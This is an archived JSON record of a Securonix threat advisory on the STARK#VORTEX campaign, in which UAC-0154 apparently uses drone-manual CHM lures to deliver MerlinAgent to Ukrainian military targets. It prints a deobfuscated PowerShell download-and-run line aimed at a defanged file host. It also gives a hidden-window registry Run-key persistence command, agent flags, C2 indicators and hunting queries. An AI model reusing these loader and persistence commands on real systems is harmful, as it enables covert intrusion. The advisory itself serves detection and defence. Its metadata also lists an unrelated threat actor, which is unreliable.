{
	"id": "11254d8c-fe2d-43a6-bf92-9476a143797f",
	"created_at": "2026-04-06T00:13:53.383623Z",
	"updated_at": "2026-04-10T03:33:20.64681Z",
	"deleted_at": null,
	"sha1_hash": "4eb0b1544fecefa45d4170259146e94876bd68de",
	"title": "Threat Labs Security Advisory: New STARK#VORTEX Attack Campaign: Threat Actors Use Drone Manual Lures to Deliver MerlinAgent Payloads",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8098566,
	"plain_text": "Threat Labs Security Advisory: New STARK#VORTEX Attack\r\nCampaign: Threat Actors Use Drone Manual Lures to Deliver\r\nMerlinAgent Payloads\r\nArchived: 2026-04-05 21:17:53 UTC\r\nBy Securonix Threat Research: D.Iuzvyk, T.Peck, O.Kolesnikov\r\nSept. 25, 2023, updated Sept. 27, 2023, updated Oct. 6, 2023\r\ntldr:\r\nSecuronix Threat Research recently discovered an attack campaign appearing to originate from the threat group\r\nUAC-0154 targeting victims using a Pilot-in-Command (PIC) Drone manual document lure to deliver malware.\r\nAs the war between Russia and Ukraine rages, the cyber warfare landscape between the two countries also\r\ncontinues to show no signs of slowing down. New tactics and malware variants continue to emerge as we’re\r\nentering the year and a half mark of the conflict.\r\nOur team has identified an interesting campaign (tracked by Securonix as STARK#VORTEX), which is actively\r\ntargeting Ukraine’s military. Since drones or unmanned aerial vehicles (UAVs) have been an integral tool used by\r\nthe Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface.\r\nLast month, the threat group tracked by the identifier UAC-0154 was identified using military-themed documents\r\ndelivered via email to Ukrainian targets (@ukr.net). Today, it would appear that the group’s tactics have changed,\r\nalong with some of the methods used to infect victims with MerlinAgent malware.\r\nAttack chain overview\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 1 of 17\n\nThe lure file presents itself as a Microsoft Help file, or .chm file. The file in this case was named “Інфо про\r\nнавчання по БПЛА для військових.v2.2.chm” which translates to “info on UAV training for the military”.\r\nMicrosoft help files are a typical file format which are used to provide application support, guides and references.\r\nCode execution begins as soon as the user opens the document through a malicious JavaScript code block\r\nembedded inside one of the HTML pages.\r\nObfuscated PowerShell code is then executed from the JavaScript code within the .chm file which was used to\r\ncontact a remote C2 server to download an obfuscated binary payload.\r\nThe payload is an obfuscated binary that gets XOR’d and decoded to produce a beacon payload for MerlinAgent\r\nmalware. Once the payload establishes communication back to its C2 server, the attackers would have full control\r\nover the victim host.\r\nWhile the attack chain is quite simple, the attackers leveraged some pretty complex TTPs and obfuscation methods\r\nin order to evade detection. We’ll go over each stage in detail further down.\r\nInitial code execution\r\nThe malicious .chm file was intentionally weaponized to execute a PowerShell one-liner on the victim machine.\r\nMicrosoft help files have been used maliciously in the past, though today they are less common as Microsoft\r\nstopped supporting the .chm file format in 2007. They can, however, be opened and executed in modern Windows\r\nversions.\r\nHelp files such as the lure document used in the STARK#VORTEX campaign, would be executed using the\r\nWindows binary hh.exe which is launched automatically when a user runs the .chm file.\r\nAs you can see from the figure below, the help file would have no trouble evading antivirus and EDR detections as\r\nit scored 0/59 detections in VirusTotal.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 2 of 17\n\nFigure 1: VirusTotal detections for Інфо про навчання по БПЛА для військових.v2.2.chm\r\nCode execution through a .chm file is a well known technique and there are several online tools available for\r\nbuilding one. It works by passing in special HTML parameters which can call a child process such as cmd.exe or\r\npowershell.exe, along with command line arguments.\r\nAs we mentioned previously, the lure document was themed as a drone or UAV manual. Examining its contents,\r\nwe see instructions written in the Ukrainian language for a DJI Mavic 3 drone.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 3 of 17\n\nFigure 2: lure document contents for Інфо про навчання по БПЛА для військових.v2.2.chm\r\nHelp file and JavaScript execution [T1059.007]\r\nSince Microsoft help files are essentially container files, they can be opened and analyzed using file archival\r\nsoftware such as 7zip. With the case of Інфо про навчання по БПЛА для військових.v2.2.chm, we’re able to\r\nobserve several HTML files contained within.\r\nFigure 3: Contents of Інфо про навчання по БПЛА для військових.v2.2.chm\r\nAfter examining the contents of page1.html, we found a huge JavaScript one liner embedded into the HTML within\r\n\u003cscript\u003e\u003c/script\u003e tags. Its contents were heavily obfuscated, however we observed it executing another obfuscated\r\nPowerShell script which we’ll dive into next.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 4 of 17\n\nFigure 4: Example of obfuscated JavaScript code found within page1.html\r\nPowerShell execution [T1059.001]\r\nThe .chm file executes cmd.exe along with the “/c start /min” commands to call the PowerShell process which\r\nexecutes inside a hidden window. The PowerShell code is heavily obfuscated in order to evade detections. Some\r\nobfuscation methods include Base64 encoding, GZIP compression, and char value substitutions.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 5 of 17\n\nFigure 5: Stage 1, obfuscated PowerShell executed by Інфо про навчання по БПЛА для військових.v2.2.chm\r\nAfter deobfuscating the Base64 encoded blob, we find more obfuscated PowerShell code. This time some key\r\ninformation such as C2 URL and payload names become visible. This is seen in the figure below.\r\nNext, we’ll clean this code up and go over it in detail to gain a better understanding of its purpose.\r\nFigure 6: Stage 2, obfuscated PowerShell executed by Інфо про навчання по БПЛА для військових.v2.2.chm\r\nWith the PowerShell code a bit more human-readable, it’s pretty clear as to what it’s doing. In general, the script\r\ndownloads a payload from hxxps://files.catbox[.]moe/g1h7zr.bin decodes and decrypts it and saves it to the local\r\nAppdata folder to SysctlHost\\ctlhost.exe.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 6 of 17\n\nFigure 7: Deobfuscated PowerShell analysis — file download, directory setup\r\nThis first bit of the script establishes a few variables such as the C2 URL ($plUrl), binary path ($plPathSuffix),\r\ndecryption key ($cryptPS) and the XOR mask size value ($xorMaskSize). The bulk of the code is stored inside the\r\ndoS function which is called at the end of the script.\r\nNext the script performs key functions:\r\n1. Constructs the target path.\r\n2. Checks if the executable file already exists at the defined path, returning -1 if it does.\r\n3. Ensures that the necessary directory exists, creating it if needed.\r\n4. Checks the success of directory creation, returning -2 if it fails.\r\nThe script then downloads the file from the C2 server. The command, as you can see is heavily obfuscated,\r\nhowever deobfuscating the PowerShell code produces the following download command:\r\n[System.Net.WebClient]::new().DownloadFile(‘hxxps://files.catbox[.]moe/g1h7zr.bin’, ”)\r\nThe command is then executed using an invoke expression (IEX).\r\nFurther down the script we find some interesting binary file manipulation code blocks which can be seen in figure\r\n8 below:\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 7 of 17\n\nFigure 8: Deobfuscated PowerShell — binary file decoding\r\nIn a nutshell, the downloaded binary file is decoded and renamed using values provided from the beginning of the\r\nscript as seen in figure 7.\r\nCompute the hash and fill the XOR mask\r\n1. A SHA-256 hasher is initialized.\r\n2. The input string $cryptPS is hashed to produce an array, $sha.\r\n3. This hash is then used to populate the $xorMask array. If the mask requires more bytes than the initial hash\r\nprovides, the hash of the previous hash is used in a chained fashion until the mask is completely filled.\r\nFile transformation using the XOR mask:\r\n1. File streams are opened:\r\n$f1 reads from an existing file at the path $p.\r\n($envAppData\\sysctlHost\\ctlhost.exe)\r\n$f2 writes to a new temporary file with the same name as $p but with a .tmp\r\n1. The file at path $p is processed in chunks of up to 4096 bytes using a buffer $b.\r\n2. For each chunk:\r\nBytes are read into the buffer from $f1.\r\nEach byte in the buffer is XOR’d with the corresponding byte from the $xorMask.\r\nThe transformed bytes are then written to the temporary file using $f2.\r\n1. This process continues until the entire file has been read and transformed.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 8 of 17\n\nNote: The outer while($false) is odd since it renders the entire subsequent code block ineffective. It could be a\r\nmistake by the attackers, or it could act as a placeholder for other binary files that would require its specific\r\nfunctionality.\r\nWith the file decoded into a variable, the next portion of the script then saves it over the original file after\r\nleveraging and then deleting a temporary file.\r\nFigure 9: Stage 3, deobfuscated PowerShell\r\nThe last bit of code takes a previously downloaded, encrypted and compressed file with a .tmp extension,\r\ndecompresses its content, writes the decompressed content back to the original file, deletes the .tmp file. The last\r\nportion of the script then executes the original file in a few different ways.\r\nThe PowerShell script appears to be written with several options and configurations in mind, hence the $false while\r\nstatement we mentioned earlier. Also the existence of optional binary file arguments which were set to “null” in\r\nthis case.\r\nBinary file analysis\r\nThe Windows binary file downloaded is a 64-bit executable at about 5MB in size. Some additional binary\r\ninformation is highlighted in figure 10 below.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 9 of 17\n\nFigure 10: ctlhost.exe — binary file overview\r\nUpon closer examination, it appears to be a generated binary executable by the MerlinAgent framework. Similar to\r\nCobalt Strike and Silver, MerlinAgent is an open source command and control framework available on Github.\r\nThe MerlinAgent framework is an open source C2 framework written in Go. It functions similar to that of Cobalt\r\nStrike or Sliver where a server instance can be set up which can build its own binary payloads. Attackers can then\r\ndistribute these payloads and incorporate them into their own malware stager or loader. MerlinAgent has a wide\r\nrange of capabilities which include:\r\nEncrypted C2 communication using TLS\r\nRemote command shell\r\nModule support (such as Mimikatz)\r\nBinary support for exe or dll clients\r\nThe agent itself supports a wide range of command flags in which blue team defenders can be on the lookout for:\r\nCommand Description\r\n-debug Enable debug output\r\n-host HTTP Host header\r\n-ja3 JA3 signature string (not the MD5 hash). Overrides -proto flag\r\n-killdate The date, as a Unix EPOCH timestamp, that the agent will quit running\r\n-maxretry The maximum amount of failed checkins before the agent will quit running\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 10 of 17\n\nCommand Description\r\n-padding The maximum amount of data that will be randomly selected and appended to every message\r\n-proto Protocol for the agent to connect with\r\n-proxy Hardcoded proxy to use for http/1.1 traffic\r\n-psk Pre-Shared Key used to encrypt initial communications\r\n-skew Amount of skew, or variance, between agent checkins\r\n-sleep Time for agent to sleep\r\n-url Full URL for agent to connect to\r\n-useragent The HTTP User-Agent header string that Agent will use while sending traffic\r\n-v Enable verbose output\r\n-version Print the agent version and exit[1]\r\nHistorically, MerlinAgent has been used by UAC-0154 in the past targeting Ukrainian officials, and many TTPs are\r\nconsistent with past activity.\r\nUpon execution, the MerlinAgent payload will immediately begin beaconing to listen.servemp3[.]com. It also\r\nestablishes persistence in the registry by creating a new key called “ctlhost” located in\r\n“HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” with the contents “cmd.exe /c start /min\r\n%windir%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -command Start-Process -filepath “C:\\Users\\\r\n[REDACTED]\\Appdata\\Roaming\\sysctlHost\\ctlhost.exe” -WindowStyle Hidden”. This will execute the binary file\r\nevery time the user logs into the system.\r\nOnce the process establishes a connection to the attacker’s C2 server, the attacker will have full control over the\r\nsystem.\r\nWrapping up…\r\nIt’s apparent that this attack was highly targeted towards the Ukrainian military given the language of the\r\ndocument, and its targeted nature.\r\nFiles and documents used in the attack chain are very capable of bypassing defenses, scoring 0 detections for the\r\nmalicious .chm file. Typically receiving a Microsoft help file over the internet would be considered unusual.\r\nHowever, the attackers framed the lure documents to appear as something an unsuspecting victim might expect to\r\nappear in a help themed document or file .\r\nC2 and infrastructure\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 11 of 17\n\nDuring the STARK#VORTEX campaign we observed the following network communication to C2 hosts.\r\nCommand and control from the MerlinAgent payload to the attacker’s C2 server used an encrypted channel over\r\nport 443. Request related details will be provided in Appendix A below.\r\nC2 Address Description\r\ncatbox[.]moe Executable file stager location. Catbox is a legitimate file sharing service.\r\nlisten.servemp3[.]com\r\n168.100.8[.]245\r\nBeacon C2 URL from ctlhost.exe\r\nSecuronix recommendations and mitigations\r\nAlways be extra cautious downloading file attachments from posts for private messages. When it comes to\r\nprevention and detection, the Securonix Threat Research Team recommends:\r\nAvoid downloading files or attachments from untrusted sources, especially if the source was unsolicited\r\nMonitor common malware staging directories, especially “C:\\ProgramData” and other temporary locations\r\nsuch as the user’s local appdata folder which was used in this attack campaign\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional log\r\ndetection coverage\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below\r\nMITRE ATT\u0026CK matrix\r\nTactic Technique\r\nExecution\r\nT1204.002: User Execution: Malicious File\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nDefense Evasion\r\nT1112: Modify Registry\r\nT1218.001: System Binary Proxy Execution: Compiled HTML File\r\nT1562.001: Impair Defenses: Disable or Modify Tools\r\nCommand and Control\r\nT1105: Ingress Tool Transfer\r\nT1573.001: Encrypted Channel: Symmetric Cryptography\r\nT1219: Remote Access Software\r\nPersistence T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nAnalyzed file hashes\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 12 of 17\n\nFile Name SHA256 (IoC)\r\nІнфо про навчання\r\nпо БПЛА для\r\nвійськових.v2.2.chm\r\n68A224AD49F2BD3D82EF6FCF5B16472DD06FECFF816263925DFB9BAC91951B21\r\ng1h7zr.bin 46FA63AF33FB7A42D3F79ED81D38E5CADDA7D311B07B2306E917179948189C7A\r\nctlhost.exe 4659D371C9B6DB1687D6DD027E95563DA88A29378DE4F87DB19B267859D04D03\r\nSome examples of relevant Securonix provisional detections\r\nEDR-ALL-1032-RU\r\nEDR-ALL-1215-ERR, WEL-ALL-1186-ERR\r\nEDR-ALL-138-ERR\r\nPSH-ALL-228-RU\r\nPSH-ALL-316-RU\r\nSome examples of relevant hunting/Spotter queries (be sure to remove square brackets “[ ]”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND eventid = “13” AND\r\neventtype = “SetValue” AND targetobject CONTAINS\r\n“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” AND (description CONTAINS “\\Appdata\\Local”\r\nOR description CONTAINS “\\Appdata\\Roaming)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS ” -\r\nbxor”\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS\r\n“IO.StreamReader” AND message CONTAINS “]::Decompress”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Process\r\nCreate” AND sourceprocessname ENDS WITH “hh.exe” AND (destinationprocessname ENDS WITH\r\n“cmd.exe” OR destinationprocessname ENDS WITH “powershell.exe”)\r\nindex = activity AND (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Proxy”)\r\nAND ((destinationhostname = “listen.servemp3[.]com” OR destinationhostname = “catbox[.]moe”) OR\r\ndestinationaddress = “168.100.8[.]245″))\r\nReferences:\r\n1. Microsoft: .chm Help files\r\n2. Github: Nishang script modified for Kautilya\r\n3. Securonix Threat Research Knowledge Sharing Series: Hiding the PowerShell Execution Flow\r\n4. MerlinAgent: новий open-source інструмент для здійснення кібератак у відношенні державних\r\nорганізацій України (CERT-UA#6995, CERT-UA#7183)\r\n5. Documentation: Merlin Command and Control framework\r\nAppendix A\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 13 of 17\n\n“request”: {\r\n   “HOST”: “listen.servemp3[.]com”,\r\n   “ACCEPT-ENCODING”: “gzip”,\r\n   “server_conn“: “168.100.8 [.]245”,\r\n   “AUTHORIZATION”: “Bearer eyJhbGc[REDACTED]UFQ”,\r\n   “CONTENT-LENGTH”: “1826”,\r\n   “CONTENT-TYPE”: “application/octet-stream; charset=utf-8”,\r\n   “USER-AGENT”: “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/40.0.2214.85 Safari/537.36”\r\n},\r\n“request_hex”: “fe 02 26 0c 00 fe 02 21[REDACTED]48 34 77 33 58 77 “,\r\n“body_hex”: “fe 0c 40 0c 00 fe 0c 3b[REDACTED]74 4b 61 55 6b 65 69 78 56 78”,\r\n“method”: “POST”,\r\n  },\r\nUpdate: The STARK#VORTEX Attack Campaign Continues as UAC-0154 Tactics\r\nChange\r\nUpdate Sept. 29, 2023: The STARK#VORTEX attack campaign surges on as the Securonix Threat Research team\r\ncontinues to monitor the skies for changes and new vectors. Currently, it would appear that the threat actors have\r\nshifted to a new staging domain while many of the TTPs have remained the same. \r\nThe naming scheme of the binary files has also changed. This time around the MerlinAgent payload appears to be\r\nmasquerading as the popular building/adventure game Minecraft. It would appear that the threat actors shifted\r\ngears into using Minecraft-themed C2 servers and payloads. \r\nThe lure document has also been retargeted. As you can see in the figure below, the document, now named\r\n“Confidential Offers.chm” follows the same malicious pattern originally observed with the STARK#VORTEX\r\ncampaign. \r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 14 of 17\n\nFigure 1: Confidential Offers.chm lure document \r\nThe help file contains a single html file which executes the malicious JavaScript payload. The HTML file is titled\r\n“Міжнародні партнери” which translates from Ukrainian to “International partners”. When opened, the content of\r\nthe lure file simply contains a few company logos.\r\nLike the original attack campaign, the latest version contains a highly-obfuscated JavaScript code block which calls\r\nand executes another obfuscated PowerShell one-liner. \r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 15 of 17\n\nFigure 2: Obfuscated JavaScript sample executed by Confidential Offers.chm\r\nThe PowerShell script downloads a binary MerlinAgent payload from hxxps://shorturl[.]at/abPU5 which redirects\r\nto hxxps://files.catbox[.]moe/sbjchf.mod. The encoded payload is decoded and then executed in almost the same\r\nfashion as we saw before. \r\nThe binary payload which gets downloaded and executed is named “minecraft.exe” and is placed in the directory\r\n“%appdata%/local/games/minecraft.exe” and the C2 beaconing address is listen.serveminecraft[.]net. Why the\r\nattackers chose to masquerade as Minecraft is unclear, other than the fact that it is a wildly popular game. This does\r\nspeculate that it was probably not intended for business systems where games would normally not be found. \r\nWrapping up…\r\nToday, we won’t go too deep into the rest of the attack chain as it is almost identical to what we first encountered\r\nlast week. The original analysis of the STARK#VORTEX campaign contains a much more in-depth analysis.\r\nUpdated IoCs and Seeder hunting queries can be found below.\r\nC2 and infrastructure\r\nAnalyzed file hashes\r\nSome examples of relevant Securonix provisional detections\r\nEDR-ALL-1032-RU\r\nEDR-ALL-1215-ERR, WEL-ALL-1186-ERR\r\nEDR-ALL-138-ERR\r\nPSH-ALL-228-RU\r\nPSH-ALL-316-RU\r\nRelevant hunting/Spotter queries (be sure to remove square brackets “[ ]”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND baseeventid = “13” and\r\neventtype = “SetValue” AND targetobject CONTAINS\r\n“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” AND (description CONTAINS “\\Appdata\\Local”\r\nOR description CONTAINS “\\Appdata\\Roaming”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS ” -\r\nbxor”\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS\r\n“IO.StreamReader” AND message CONTAINS “]::Decompress”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Process\r\nCreate” AND sourceprocessname = “hh.exe” AND (destinationprocessname = “cmd.exe” OR\r\ndestinationprocessname = “powershell.exe”)\r\nindex = activity AND (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Proxy”)\r\nAND ((destinationhostname = “listen.serveminecraft[.]net” OR destinationhostname = “catbox[.]moe”) OR\r\ndestinationaddress = “168.100.8[.]245”))\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 16 of 17\n\nReferences:\r\n1. New STARK#VORTEX Attack Campaign: Threat Actors Use Drone Manual Lures to Deliver MerlinAgent\r\nPayloads\r\n2. Microsoft: .chm Help files\r\n3. Github: Nishang script modified for Kautilya\r\n4. Securonix Threat Research Knowledge Sharing Series: Hiding the PowerShell Execution Flow\r\n5. MerlinAgent: новий open-source інструмент для здійснення кібератак у відношенні державних\r\nорганізацій України (CERT-UA#6995, CERT-UA#7183)\r\n6. Documentation: Merlin Command and Control framework\r\nSource: https://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-t\r\no-deliver-merlinagent-payloads/\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 17 of 17\n\n-debug -host Enable debug output HTTP Host header   \n-ja3 JA3 signature string (not the MD5 hash). Overrides -proto flag\n-killdate The date, as a Unix EPOCH timestamp, that the agent will quit running\n-maxretry The maximum amount of failed checkins before the agent will quit running\n   Page 10 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/"
	],
	"report_names": [
		"threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads"
	],
	"threat_actors": [
		{
			"id": "67bf0462-41a3-4da5-b876-187e9ef7c375",
			"created_at": "2022-10-25T16:07:23.44832Z",
			"updated_at": "2026-04-10T02:00:04.607111Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"Careto",
				"The Mask",
				"Ugly Face"
			],
			"source_name": "ETDA:Careto",
			"tools": [
				"Careto"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f5bf6853-3f6e-452c-a7b7-8f81c9a27476",
			"created_at": "2023-01-06T13:46:38.677391Z",
			"updated_at": "2026-04-10T02:00:03.064818Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"The Mask",
				"Ugly Face"
			],
			"source_name": "MISPGALAXY:Careto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b1acb4fd-d57f-4b28-818e-d3ec282d43d5",
			"created_at": "2024-09-20T02:00:04.580908Z",
			"updated_at": "2026-04-10T02:00:03.698967Z",
			"deleted_at": null,
			"main_name": "UAC-0154",
			"aliases": [],
			"source_name": "MISPGALAXY:UAC-0154",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434433,
	"ts_updated_at": 1775792000,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4eb0b1544fecefa45d4170259146e94876bd68de.pdf",
		"text": "https://archive.orkl.eu/4eb0b1544fecefa45d4170259146e94876bd68de.txt",
		"img": "https://archive.orkl.eu/4eb0b1544fecefa45d4170259146e94876bd68de.jpg"
	}
}